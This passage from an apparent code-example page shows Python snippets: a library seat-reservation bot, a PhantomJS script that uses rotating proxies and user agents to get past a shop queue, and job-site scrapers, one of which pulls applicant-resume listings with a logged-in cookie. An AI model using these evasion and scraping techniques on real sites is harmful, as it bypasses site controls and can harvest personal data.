                break
        else:
            logger.info('列表页面访问失败 %s ' % url)
            data['code'] = 500
            flg = False
            break
        # 对于职位很不错的列表页 直接跳出
        if '以下职位也很不错' in content:
            flg = False
            logger.info('含有 以下职位也很不错 跳出循环')
            data['code'] = 200
            break
    data['pageNum'] = page_num
    return data
Example #27
    def reserve_a_seat(self, m_libid, m_clssrm, m_seat_num, m_coordinate, all_lib_clssrm, get_hexcodejs_from_url, verify_key, reserve_url_prefix, lib_seat_info):
        # func_name = 'reserve_a_seat' + str('threadid='+str(self.threadID) + ' thread_name='+str(self.thread_name)+' counter='+str(self.counter))
        func_name = '[r_s] thread='+str(self.thread_name)+'|  '
        debug_p(func_name, 'lib_seat_info=', lib_seat_info, 'libid', m_libid,  'coordinate', m_coordinate)

        requests_time_limit = 3
        self.tmp_trace_dct = {}

        # # exec_time
        exec_ts = time.time() + 0.1  # '1564905302.6147149'
        millisecond = str(str(exec_ts).split('.')[-1])[:3]
        t = str(time.strftime("%Y.%m.%d_%H:%M:%S", time.localtime(exec_ts))) + '.' + millisecond
        self.tmp_trace_dct['exe_time'] = t

        # add lib_seat_info
        # self.task_result += lib_seat_info + '\n'
        # self.task_result += '执行:' + self.exe_time + '\n'

        # type = list  [(lib, clssrm), ()...]
        candidate_libid_clssrm = [{}]
        if int(m_libid) > 0:
            candidate_libid_clssrm = [(m_libid, m_clssrm)]
        elif int(m_libid) < 0:
            # all_lib_clssrm  dict{libid: clssrm}
            all_lib_clssrm.pop(m_libid[1:], 'default_value')
            candidate_libid_clssrm = random.sample(all_lib_clssrm.items(), min(self.request_num_limit, len(all_lib_clssrm)))
        else:
            candidate_libid_clssrm = random.sample(all_lib_clssrm.items(), min(self.request_num_limit, len(all_lib_clssrm)))

        debug_p(func_name, '||candidate libid=', candidate_libid_clssrm)

        # candidate_libid_clssrm = [(lib, clssrm), ()...]
        for (libid, clssrm) in candidate_libid_clssrm:

            self.tmp_trace_dct['libid'] = libid
            self.tmp_trace_dct['clssrm'] = clssrm

            if requests_time_limit <= 0:
                break

            ### test
            time.sleep(3)

            # debug_p(func_name, 'get_hexcodejs_from_url=', get_hexcodejs_from_url)
            # entry pre_seatmap_page

            # print('123', self.a_task.M_COOKIES)

            #
            if self.a_task.pattern == "PRE":
                get_hexcodejs_from_url = get_hexcodejs_from_url.format(libid=libid)
            else:
                # TODAY
                get_hexcodejs_from_url = get_hexcodejs_from_url.format(libid=libid, now_time=int(time.time()))

            html_seatmap = utils.get_response(
                url=get_hexcodejs_from_url, sess=self.sess,
                m_headers=self.a_task.M_HEADERS, m_cookies=self.a_task.M_COOKIES,
                verify_key=verify_key, platform=self.a_task.platform)
            # judge html_doc
            if not html_seatmap:
                # sessid invalid--> task completed
                self.tmp_trace_dct['code'] = 404
                self.tmp_trace_dct['msg'] = '尝试进入座位表失败!可能:{不在预约时间, 服务器无响应, id失效}'

                # task failed,  sessionid invalid
                debug_p(func_name, '[E]: pre_seatmap_page is none, get_hexcodejs_from_url='+get_hexcodejs_from_url)
                # info = '结果:{succ_failed}-【{msg}】\n'
                # info = info.format(succ_failed='FAILED',
                #                    msg='未知原因-进入座位表页面失败,请反馈管理员处理...')
                # self.task_result += info
                # sessionid invalid, task completed
                return True #, 'pre_seatmap_page is none, get_hexcodejs_from_url='+get_hexcodejs_from_url

            # get get_empty_seat
            # type = list [(seat_num, coordinate), (), ...]
            candidate_seat_crdnt = []
            if int(libid) > 0 and int(m_seat_num) > 0:
                candidate_seat_crdnt = [(m_seat_num, m_coordinate)]
            elif int(libid) <= 0:
                # assert seat_num==0
                candidate_seat_crdnt = self.get_empty_seat(html_seatmap=html_seatmap, number=1)
            elif int(m_seat_num) <= 0:
                # m_lib > 0 and m_seat_num <= 0 , get three candidate without m_seat_num
                candidate_seat_crdnt = self.get_empty_seat(html_seatmap=html_seatmap, number=self.request_num_limit,
                                                           discard_seatnum=m_seat_num)
            else:
                pass
            if len(candidate_seat_crdnt) == 0:
                # no candidate seat crdnt
                continue
            debug_p(func_name, '||candidate seat=', candidate_seat_crdnt)
            #
            soup = BeautifulSoup(html_seatmap, 'html.parser')

            ### test
            open('lxz_seatmap.html', 'w').write(html_seatmap)

            # debug_p(func_name, '\n\nhtml_doc=', html_seatmap)
            # get hexch_js_code
            # hexch_js_url = [e for e in soup.find_all('script') if
            #        str(e).find('https://static.wechat.v2.traceint.com/template/theme2/cache/layout') >= 0][0]['src']
            debug_p(func_name, 'REG_HEXCODE_URL=', self.a_task.REG_HEXCODE_URL)
            hexch_js_url = soup.find('script', src=re.compile(
                                            self.a_task.REG_HEXCODE_URL)).get('src', '')
            debug_p(func_name, 'hexch_js_url=', hexch_js_url, 'ts=', time.time()-exec_ts+0.1)

            hexch_js_code = requests.get(hexch_js_url, verify=False)
            hexch_js_code.encoding = 'utf8'
            hexch_js_code = hexch_js_code.text

            # insert 'return ...' into hexch_js_code
            # pattern = re.compile(r'(?<=[A-Z]\.ajax_get\().*?(?=,)')
            pattern = re.compile(r'(?<=T\.ajax_get\().*?(?=,)')
            ajax_url = pattern.search(hexch_js_code).group(0).replace('AJAX_URL', reserve_url_prefix)
            debug_p(func_name, 'ajax_url=', ajax_url, 'ts=', time.time()-exec_ts+0.1)
            # hexch_js_code = re.sub(r'[A-Z]\.ajax_get', 'return %s ; T.ajax_get' % ajax_url, hexch_js_code)
            hexch_js_code = re.sub(r'T\.ajax_get', 'return %s ; T.ajax_get' % ajax_url, hexch_js_code)


            #  candidate_seat_crdnt = [(seat_num, coordinate), (), ...]
            for seat_num, cordinate in candidate_seat_crdnt:

                self.tmp_trace_dct['libid'] = libid
                self.tmp_trace_dct['clssrm'] = clssrm
                self.tmp_trace_dct['seat_num'] = seat_num
                self.tmp_trace_dct['cordinate'] = cordinate
                self.tmp_trace_dct['code'] = ''
                self.tmp_trace_dct['msg'] = '没有合适的'

                if requests_time_limit <= 0:
                    break
                ### test
                time.sleep(3)

                # exe hexch_js_code
                tmp = execjs.compile(hexch_js_code)
                http_hexch_seatinfo = tmp.call('reserve_seat', libid, cordinate)
                debug_p(func_name, 'http_hexch_seatinfo=', http_hexch_seatinfo, 'ts=', time.time()-exec_ts+0.1)
                # debug_p(func_name, 'cookies=', self.a_task.M_COOKIES)

                # if need verify code , try times = 1
                try_times_limit = 1
                # check if need  verify code
                vc_code = ''
                while True:
                    time.sleep(3)
                    # reserve a seat
                    requests_time_limit -= 1

                    # exec_time
                    t = time.time() + 0.1  # '1564905302.6147149'
                    millisecond = str(str(t).split('.')[-1])[:3]
                    exe_time = str(time.strftime("%Y.%m.%d_%H:%M:%S", time.localtime(t))) + '.' + millisecond
                    debug_p(func_name, 'request, tmp_trace_dct=', self.tmp_trace_dct)

                    # response = requests.get(http_hexch_seatinfo, proxies=utils.get_proxy(), headers=self.a_task.M_HEADERS, cookies=self.a_task.M_COOKIES, verify=False)
                    response = self.sess.get(http_hexch_seatinfo + vc_code, proxies=utils.get_proxy(),
                                             headers=self.a_task.M_HEADERS, cookies=self.a_task.M_COOKIES,
                                             verify=False)
                    # response.encoding = 'utf8'
                    debug_p(func_name, 'reserve response=', response.text[:300])
                    # type(code) = int
                    code, msg = self.parse_response(response=response)
                    self.tmp_trace_dct['code'] = code
                    self.tmp_trace_dct['msg'] = msg

                    if code != 1000:
                        # self.trace_dct_ls += [{'libid': libid, 'clssrm': clssrm, 'seat_num': seat_num, 'cordinate': cordinate,
                        #                         'exe_time': exe_time, 'code': code, 'msg': msg}]
                        break

                    elif code == 1000 and try_times_limit > 0:
                        try_times_limit -= 1
                        # need vc code
                        vc_code = self.get_verifycode(imageUrl=self.a_task.CURRENT_URL['verifycode_page'])
                        # self.feedback += '验证码为:' + str(vc_code) + '' + '\n'
                        # self.trace_dct_ls[-1]['msg'] += '验证码为:' + str(vc_code) + '' + '\n'
                        # msg += '验证码为:' + str(vc_code) + '' + '\n'
                    else:
                        #
                        break

                # success or failed but completed
                completed_flag = self.check_msg(self.tmp_trace_dct.get('msg', '没有合适的'))

                self.tmp_trace_dct['completed_flag'] = completed_flag

                # deep copy
                self.trace_dct_ls += [dict(self.tmp_trace_dct.items())]
                # refresh
                self.tmp_trace_dct = {}

                # self.trace_dct_ls[-1]['completed_flag'] = int(completed_flag)
                if code == 0 or completed_flag:
                    # completed, task done, discard second candidate seat
                    return True
        # normal done, failed reserve a seat, completed_flag = 'continue'
        # failed and try reserve next candidate seat,
        # if 'seat_num' not in self.tmp_trace_dct:
        self.tmp_trace_dct['clssrm'] = self.tmp_trace_dct.get('clssrm', '没有合适的')
        self.tmp_trace_dct['seat_num'] = self.tmp_trace_dct.get('seat_num', '没有合适的')
        self.tmp_trace_dct['completed_flag'] = self.tmp_trace_dct.get('completed_flag', 'continue')
        # task continue
        return False
Example #28
def run(url):
    valid_url = check_if_valid_url(url)
    if not valid_url:
        print("=> Invalid URL, must start with http://www.\n")
    else:
        print("=> URL is valid\n")

    drivers = []
    for session_num in range(0, len(PROXIES) if USE_PROXIES else NUM_SESSIONS):
        service_args = []
        if USE_PROXIES:
            proxy, proxy_auth = get_proxy(session_num)
            service_args = [
                '--proxy={}'.format(proxy),
                '--proxy-type=http',
                '--ignore-ssl-errors=true',
            ]

            if proxy_auth:
                service_args.append('--proxy-auth={}'.format(proxy_auth))

            logging.debug(service_args)

        user_agent = get_user_agent(session_num)
        desired_capabilities = dict(DesiredCapabilities.PHANTOMJS)
        desired_capabilities['phantomjs.page.settings.userAgent'] = user_agent
        desired_capabilities['phantomjs.page.customHeaders.User-Agent'] = user_agent
        desired_capabilities['phantomjs.page.customHeaders.customHeaders'] = \
            {'Accept': 'text/html', 'Content-type': 'text/html', 'Cache-Control': 'max-age=0'}

        driver = webdriver.PhantomJS(executable_path=PHANTOM_JS_LOCATION, service_args=service_args)
        driver.set_page_load_timeout(30)

        drivers.append(driver)

    for driver in drivers:
        load_session(driver, url)

    # Now the product pages are loaded, we are just gonna check if the hmac cookie is set on one of our session
    # If true we want to transfer the session to a Chrome browser to let you check-out
    opened_drivers = []
    while True:
        logging.info("Checking for hmac in all session cookies.. [10s interval]")
        for session_num, driver in enumerate(drivers):
            if check_if_past_queue(driver) and driver not in opened_drivers:
                opened_drivers.append(driver)

                logging.info("[HMAC] Cookie found on session {}".format(driver.session_id))

                # New thread open browser
                user_agent = get_user_agent(session_num)
                if USE_PROXIES:
                    proxy, proxy_auth = get_proxy(session_num)
                else:
                    proxy = None
                    proxy_auth = None

                threading.Thread(target=transfer_session, kwargs={
                    'driver': driver,
                    'proxy': proxy,
                    'proxy_auth': proxy_auth,
                    'user_agent': user_agent
                }).start()

        time.sleep(10)
Example #29
def main():
    logger = utils.get_logger()
    global zones
    global industrys
    proxy = utils.get_proxy()
    
    if not proxy:
        logger.info('did not get proxy, quit!!!')
        return 
    # proxy = None
    job_file = open('keys_number', 'r')
    jobtitles = job_file.readlines()
    job_file.close()
    apply_origin_task = False
    origin_task = {"city": "101010100", "zone": "%E6%9C%9D%E9%98%B3%E5%8C%BA", "money": 5, "jobtitle": "170501", "education": 205}
    for city in CITY_LIST:
        logger.info('---------------------------------------------------------')
        # time.sleep(10)
        if apply_origin_task and 'city' in origin_task:
            if city[0] != origin_task['city']:
                continue
            else:
                origin_task.pop('city')
            if not origin_task:
                apply_origin_task = False
                continue
        print apply_origin_task, origin_task, city
        process_dict = {'city': city[0], 'cityName': city[1]}
        list_result = get_list(page_now=30, is_get_zone=True, proxy=proxy, **process_dict)
        logger.info('1================'+str(list_result))
        # time.sleep(5)
        if (len(list_result['jobs'])<=14) and (not apply_origin_task):
            task_file = open('task_file', 'a')
            task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
            task_file.close()
            continue
        for zone in list_result['zone']:
            if apply_origin_task and 'zone' in origin_task:
                if zone[0] != origin_task['zone']:
                    continue
                else:
                    origin_task.pop('zone')
                if not origin_task:
                    apply_origin_task = False
                    continue

            else:
                process_dict = {'city': city[0], 'zone': zone[0], 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                list_result = get_list(page_now=30, proxy=proxy, **process_dict)
                logger.info('2================'+str(list_result))
                # time.sleep(5)
                if len(list_result['jobs'])<=14:
                    task_file = open('task_file', 'a')
                    task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                    task_file.close()
                    continue
            for jobtitle in jobtitles:
                if apply_origin_task and 'jobtitle' in origin_task:
                    if jobtitle.split()[0] != origin_task['jobtitle']:
                        continue
                    else:
                        origin_task.pop('jobtitle')
                    if not origin_task:
                        apply_origin_task = False
                        continue
                else:
                    process_dict = {'city': city[0], 'zone': zone[0], 'jobtitle': jobtitle.split()[0], 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                    list_result = get_list(page_now=30, proxy=proxy, **process_dict)
                    logger.info('3================'+str(list_result))
                    # time.sleep(5)
                    if len(list_result['jobs'])<=14:
                        task_file = open('task_file', 'a')
                        task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                        task_file.close()
                        continue
                for money in MONEY_LIST:
                    if apply_origin_task and 'money' in origin_task:
                        if money != origin_task['money']:
                            continue
                        else:
                            origin_task.pop('money')
                        if not origin_task:
                            apply_origin_task = False
                            continue
                    else:
                        process_dict = {'city': city[0], 'zone': zone[0], 'jobtitle': jobtitle.split()[0], 'money': money, 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                        list_result = get_list(page_now=30, proxy=proxy, **process_dict)
                        logger.info('4================'+str(list_result))
                        # time.sleep(5)
                        if len(list_result['jobs'])<=14:
                            task_file = open('task_file', 'a')
                            task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                            task_file.close()
                            continue
                    for education in EDUCATION_LIST:
                        if apply_origin_task and 'education' in origin_task:
                            if education != origin_task['education']:
                                continue
                            else:
                                origin_task.pop('education')
                            if not origin_task:
                                apply_origin_task = False
                                continue
                        else:
                            process_dict = {'city': city[0], 'zone': zone[0], 'jobtitle': jobtitle.split()[0], 'money': money, 'education': education, 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                            list_result = get_list(page_now=30, proxy=proxy, **process_dict)
                            logger.info('5================'+str(list_result))
                            # time.sleep(5)
                            if len(list_result['jobs'])<=14:
                                task_file = open('task_file', 'a')
                                task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                                task_file.close()
                                continue
                        for experience in EXPERIENCE_LIST:
                            if apply_origin_task and 'experience' in origin_task:
                                if experience != origin_task['experience']:
                                    continue
                                else:
                                    origin_task.pop('experience')
                                if not origin_task:
                                    apply_origin_task = False
                                    continue
                            else:
                                process_dict = {'city': city[0], 'zone': zone[0], 'jobtitle': jobtitle.split()[0], 'money': money, 'education': education, 'experience': experience, 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                                list_result = get_list(page_now=30, proxy=proxy, **process_dict)
                                logger.info('6================'+str(list_result))
                                # time.sleep(5)
                                if len(list_result['jobs'])<=14:
                                    task_file = open('task_file', 'a')
                                    task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                                    task_file.close()
                                    continue
                            for size in SIZE_LIST:
                                if apply_origin_task and 'size' in origin_task:
                                    if size != origin_task['size']:
                                        continue
                                    else:
                                        origin_task.pop('size')
                                    if not origin_task:
                                        apply_origin_task = False
                                        continue
                                else:
                                    process_dict = {'city': city[0], 'zone': zone[0], 'jobtitle': jobtitle.split()[0], 'money': money, 'education': education, 'experience': experience, 'size': size, 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                                    task_file = open('task_file', 'a')
                                    task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                                    task_file.close()
Example #30
def process(task):
    logger = utils.get_logger()
    logger.info('process jd_liepin start!!!')
    result = {'code': 0}
    redis_client = get_redis_client()
    task_data_list = task.get('data', [])
    if not task_data_list or not task_data_list[0]['executeParam']:
        logger.info('did not get task_data_list!!!')
        result['code'] = 1
        return result
    # print task_data_list
    # time.sleep(50)
    task_data = json.loads(task_data_list[0]['executeParam'])
    # task_data = task_data_list[0]['executeParam']
    # if set(['cityCode', 'cityName', 'funcCode', 'funcName']) - set(task_data.keys()):
    if set(['zone']) - set(task_data.keys()):
        logger.info('not get full keys:' + str(task_data.keys()))
        result['code'] = 2
        return result
    logger.info('deal with ' + str(task_data))
    task_data['pagenum'] = int(task_data.get('pagenum', 0))
    get_next_page_tag = True
    # proxy = utils.get_proxy()['proxy']
    proxy = utils.get_proxy()
    headers = {
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding':
        'gzip, deflate, sdch, br',
        'Accept-Language':
        'zh-CN,zh;q=0.8',
        'Host':
        'www.liepin.com',
        #'Upgrade-Insecure-Requests':'1',
        'User-Agent':
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
    }
    headers = {}
    while get_next_page_tag:

        zone = task_data.get('zone', '')
        # industry = task_data.get('industry', '')
        # industry2 = task_data.get('industry2', '')
        money = task_data.get('money', '')
        compkind = task_data.get('compkind', '')
        jobkind = task_data.get('jobkind', '')
        size = task_data.get('size', '')
        jobtitle = task_data.get('jobTitles', '')
        key_word = task_data.get('key', '')

        dqs_param = str(zone) if zone else ''
        # industry_param = str(industry) if industry else ''
        # industry_2_param = str(industry2) if industry else ''
        jobTitles_param = str(jobtitle) if jobtitle else ''
        money_param = str(money) if money else ''
        compkind_param = str(compkind) if compkind else ''
        jobkind_param = str(jobkind) if jobkind else ''
        size_param = str(size) if size else ''
        key_word_param = str(key_word) if key_word else ''

        # list_url = 'https://www.liepin.com/zhaopin/?pubTime=3&fromSearchBtn=2&init=-1&industryType='+industry_param+'&industries='+industry_2_param+'&salary='+money_param+'&jobKind='+jobkind_param+'&compscale='+size_param+'&compkind='+compkind_param+'&dqs='+dqs_param+'&curPage='+str(task_data['pagenum'])

        # list_url = 'https://www.liepin.com/zhaopin/?pubTime=1&fromSearchBtn=2&init=-1&jobTitles='+jobTitles_param+'&salary='+money_param+'&jobKind=4&compscale='+size_param+'&compkind='+compkind_param+'&dqs='+dqs_param+'&curPage='+str(task_data['pagenum'])+'&key='+key_word_param
        #list_url = 'https://www.liepin.com/zhaopin/?pubTime=1&init=-1&jobTitles='+jobTitles_param+'&salary=&jobKind=&compscale=&compkind=&dqs='+dqs_param+'&searchType=1&d_pageSize=40&d_curPage='+str(task_data['pagenum'])+'&key='
        list_url = 'https://www.liepin.com/zhaopin/?pubTime=1&jobTitles=' + jobTitles_param + '&searchType=1&dqs=' + dqs_param + '&industryType=&industries=&salary=&key=&d_pageSize=40&d_curPage=' + str(
            task_data['pagenum']) + '&&init=-1'
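        # Query parameters, as used above: dqs carries the district code(s) from `zone`,
        # jobTitles the job-function filter, d_curPage the page index from
        # task_data['pagenum'], and d_pageSize the page size (40); pubTime=1 presumably
        # restricts results to recently published postings.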
        try:
            for x in xrange(settings.project_settings['DOWNLOAD_RETRY_TIMES']):
                logger.info('start download list:' + list_url)
                list_result = utils.download(url=list_url,
                                             proxy=proxy,
                                             headers=headers)
                if not list_result['code']:
                    if len(list_result['data']) < 1024:
                        logger.info('get ' + list_result['data'])
                    else:
                        break
                proxy = utils.get_proxy()
                time.sleep(2)
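            # for/else: the else branch below runs only when the retry loop finished
            # without a break, i.e. every download attempt failed or returned a stub page.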
            else:
                logger.info('error when download:' + list_url)
                result['executeParam'] = json.dumps(task_data)
                return result
            # while True:
            #     logger.info('start download list:'+list_url)
            #     list_result = utils.download(url=list_url, proxy=proxy, headers=headers)
            #     if not list_result['code']:
            #         break
            #     proxy = utils.get_proxy()
            #     time.sleep(2)
            # time.sleep(300)
            if list_result['code']:
                logger.info('get error when download list:' + str(list_result))
                raise Exception
            else:
                logger.info('success when download:' + list_url)
            tree_root = etree.HTML(list_result['data'])
            # sojob_result = tree_root.xpath('//div[@class="sojob-result "]') or tree_root.xpath('//div[@class="sojob-result"]') or tree_root.xpath('//div[@class="sojob-result sojob-no-result"]')
            job_list = tree_root.xpath('//ul[@class="sojob-list"]/li')
            if not job_list:
                logger.info('did not get job_list, return!!!')
                logger.info(u'没有符合条件的职位 %s' %
                            task_data_list[0]['executeParam'])
                get_next_page_tag = False
                break
            # job_list = tree_root.xpath('//div[@class="job-box"]/div[@class="job-list"]/ul/li')
            # next_page = tree_root.xpath('''.//a[@onclick="clickLog('from=chr_list_lowpage_next');"]''')
            job_count_number = 0

            download_day = str(time.localtime().tm_mon) + '-' + str(
                time.localtime().tm_mday)

            for job_index, job in enumerate(job_list):
                # 'downgrade-search' items appear to mark the start of relaxed/recommended
                # results, so everything from this point on is not an exact match.
                if job.attrib.get('class', '') == 'downgrade-search':
                    if not job_count_number:
                        logger.info(u'没有符合条件的职位 %s' %
                                    task_data_list[0]['executeParam'])
                        get_next_page_tag = False
                    break
                try:
                    job_info = job.xpath(
                        './div[@class="sojob-item-main clearfix"]/div[@class="job-info"]'
                    )
                    if job_info:
                        job_url = 'https://www.liepin.com' + job_info[0].xpath(
                            './h3/a')[0].attrib['href']
                    else:
                        continue
                    job_count_number += 1

                    # check if need download or not
                    job_key = 'liepin_jd_' + job_url.split('/')[-1].split(
                        '.')[0]
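                    # e.g. (assumption about the URL shape) a posting at
                    # https://www.liepin.com/job/1234567.shtml yields the dedup key 'liepin_jd_1234567'.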
                    has_find_in_redis = False
                    try:
                        job_download_time = redis_client.get(job_key)
                        if job_download_time == download_day:
                            has_find_in_redis = True
                        else:
                            redis_client.set(job_key, download_day)
                    except Exception, e:
                        # redis_client.set(job_key, download_day)
                        logger.info('get error when use redis.')
                        pass
                    if has_find_in_redis:
                        logger.info('has find %s in redis' % job_key)
                        continue
                    else:
                        logger.info('not find %s in redis' % job_key)

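                    # Icon classes on the list item drive the flags checked below:
                    # a red triangle marks an urgent post; blue / orange triangles set
                    # posting type 1 / 3 (2 is the default when neither is present).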
                    urgent_flag = 0
                    type_flag = 2
                    if job.xpath('.//i[@class="icon icon-red-triangle"]'):
                        urgent_flag = 1
                    if job.xpath('.//i[@class="icon icon-blue-triangle"]'):
                        type_flag = 1
                    if job.xpath('.//i[@class="icon icon-orange-triangle"]'):
                        type_flag = 3
                    time.sleep(5)

                    job_content = {
                        'content': '',
                        'type': type_flag,
                        'urgentFlag': urgent_flag,
                    }

                    for x in xrange(
                            settings.project_settings['DOWNLOAD_RETRY_TIMES']):
                        logger.info('start download job:' + job_url)
                        job_result = utils.download(url=job_url,
                                                    proxy=proxy,
                                                    headers=headers)
                        if not job_result['code']:
                            if len(job_result['data']) < 1024:
                                logger.info('get ' + job_result['data'])
                            else:
                                break
                        proxy = utils.get_proxy()
                        time.sleep(2)
                    else:
                        logger.info('error when download:' + job_url)
                        continue
                        # result['executeParam'] = json.dumps(task_data)
                        # return result
                    # while True:
                    #     logger.info('start download job:'+job_url)
                    #     job_result = utils.download(url=job_url, proxy=proxy, headers=headers)
                    #     if not job_result['code']:
                    #         break
                    #     proxy = utils.get_proxy()
                    #     time.sleep(2)
                    if job_result['code']:
                        logger.info('get error when download job_url:' +
                                    job_url + str(job_result))
                        continue
                    else:
                        logger.info('success when download:' + job_url)
                    job_root = etree.HTML(job_result['data'])
                    company_urls = job_root.xpath(
                        '//div[@class="title-info"]/h3/a')
                    company_info = ''
                    if not company_urls or not company_urls[0].attrib.get(
                            'href', ''):
                        logger.info('not get company_urls')
                    else:
                        company_url = company_urls[0].attrib['href']
                        for x in xrange(
                                settings.
                                project_settings['DOWNLOAD_RETRY_TIMES']):
                            logger.info('start download company:' +
                                        company_url)
                            company_result = utils.download(url=company_url,
                                                            proxy=proxy,
                                                            headers=headers)
                            if not company_result['code']:
                                if len(company_result['data']) < 1024:
                                    logger.info('get ' + company_result['data'])
                                else:
                                    break
                            proxy = utils.get_proxy()
                            time.sleep(2)
                        else:
                            logger.info('error when download:' + company_url)
                            continue
                            # result['executeParam'] = json.dumps(task_data)
                            # return result
                        # while True:
                        #     logger.info('start download company:'+company_url)
                        #     company_result = utils.download(url=company_url, proxy=utils.get_proxy(), headers=headers)
                        #     if not company_result['code']:
                        #         break
                        #     proxy = utils.get_proxy()
                        #     time.sleep(2)
                        if company_result['code']:
                            logger.info(
                                'get error when download company_url:' +
                                company_url + str(company_result))
                        else:
                            logger.info('success when download:' + company_url)
                            company_info = company_result['data']

                    job_content['content'] = job_result['data'].encode('utf8')
                    job_str = json.dumps(job_content, ensure_ascii=False)
                    trace_uuid = str(uuid.uuid1())
                    sql = 'insert into jd_raw (source, content, createBy, trackId, createtime, pageUrl, searchConditions, pageNum, pageIndex, contactInfo) values ("' + settings.project_settings[
                        'SOURCE'] + '", %s, "python", %s, now(), %s, %s, %s, %s, %s)'
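                    # Only SOURCE is inlined into the SQL string; the remaining columns are
                    # bound through the %s placeholders from sql_value below.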
                    # task_data['cityName'] =  task_data['cityName'].decode('utf8')
                    # task_data['funcName'] =  task_data['funcName'].decode('utf8')
                    sql_value = (job_str, trace_uuid, job_url,
                                 json.dumps(task_data, ensure_ascii=False),
                                 task_data['pagenum'], job_index,
                                 company_info.encode('utf8'))
                    kafka_data = {
                        "channelType": "WEB",
                        "content": {
                            "content":
                            job_str,
                            "id":
                            '',
                            "createBy":
                            "python",
                            "createTime":
                            int(time.time() * 1000),
                            "ip":
                            proxy,
                            "jdUpdateTime":
                            '',
                            "source":
                            settings.project_settings['SOURCE'],
                            "trackId":
                            '',
                            'contactInfo':
                            company_info.encode('utf8'),
                            'searchConditions':
                            json.dumps(task_data, ensure_ascii=False),
                            'pageUrl':
                            job_url,
                        },
                        "interfaceType": "PARSE",
                        "resourceDataType": "RAW",
                        "resourceType":
                        settings.project_settings['RESOURCE_TYPE'],
                        'protocolType': 'HTTP',
                        "source": settings.project_settings['SOURCE'],
                        "trackId": '',
                    }

                    # f=open('kafka_data', 'a')
                    # f.write(json.dumps(kafka_data)+'\n')
                    # f.close()
                    # time.sleep(10)
                    utils.save_data(sql, sql_value, kafka_data)
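                    # utils.save_data is assumed to both execute the INSERT above and
                    # publish kafka_data to the parse queue (the helper is not shown here).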

                except Exception, e:
                    logger.info('get error when download:' + job_url +
                                str(traceback.format_exc()))
                    continue
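
# A minimal invocation sketch for process() (assumptions: the scheduler passes a dict
# shaped like {'data': [{'executeParam': '<JSON string of search filters>'}]};
# the zone value below is only a placeholder district code):
#
#   demo_task = {'data': [{'executeParam': json.dumps({'zone': '010', 'pagenum': 0})}]}
#   process(demo_task)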
Exemplo n.º 31
0
def parse_next_page(cookie, page_num, max_page):
    post_url = "http://rd2.zhaopin.com/rdapply/resumes/apply/search?SF_1_1_38=2,9&orderBy=CreateTime"
    params = {
        "PageList2": "",
        "DColumn_hidden": "",
        "searchKeyword": "",
        "curSubmitRecord": "1797",
        "curMaxPageNum": "90",
        "buttonAsse": "导入测评系统",
        "buttonInfo": "发通知信",
        "SF_1_1_50": "1",
        "SF_1_1_51": "-1",
        "SF_1_1_45": "",
        "SF_1_1_44": "",
        "SF_1_1_52": "0",
        "SF_1_1_49": "0",
        "IsInvited": "0",
        "position_city": "[%%POSITION_CITY%%]",
        "DColumn_hidden": "",
        "deptName": "",
        "select_unique_id": "",
        "selectedResumeList": "",
        "PageNo": "",
        "PosState": "",
        "MinRowID": "",
        "MaxRowID": "2722819791",
        "RowsCount": "123",
        "PagesCount": "5",
        "PageType": "0",
        "CurrentPageNum": page_num,
        "Position_IDs": "[%%POSITION_IDS%%]",
        "Position_ID": "[%%POSITION_ID%%]",
        "SortType": "0",
        "isCmpSum": "0",
        "SelectIndex_Opt": "0",
        "Resume_count": "0",
        "CID": "44036673",
        "forwardingEmailList": "",
        "click_search_op_type": "-1",
        " X-Requested-With": "XMLHttpRequest",
    }
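    # The bracketed [%%...%%] tokens above look like template placeholders from the
    # captured request; the caller is presumably expected to substitute real position
    # and city IDs before posting (assumption, left untouched here).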
    headers = {
        "Host": "rd2.zhaopin.com",
        "Accept": "*/*",
        "Origin": "http://rd2.zhaopin.com",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent":
        "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML:like Gecko) Chrome/52.0.2743.116 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://rd2.zhaopin.com/RdApply/Resumes/Apply/index",
        "Accept-Language": "zh-CN,zh;q=0.8",
        "Cookie": cookie,
    }
    session = requests.session()
    # retry up to 3 times with a fresh proxy; parse only the first successful response
    for x in xrange(3):
        proxy = utils.get_proxy()
        try:
            page = session.post(url=post_url,
                                headers=headers,
                                data=params,
                                proxies=proxy,
                                timeout=10).content
        except requests.RequestException:
            continue
        parse_list(page, page_num, max_page, cookie)
        break
    return False
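
# A minimal usage sketch (assumptions: `my_cookie` is just a placeholder for a logged-in
# rd2.zhaopin.com cookie string, and parse_list() persists whatever it extracts):
#
#   parse_next_page(cookie=my_cookie, page_num=2, max_page=90)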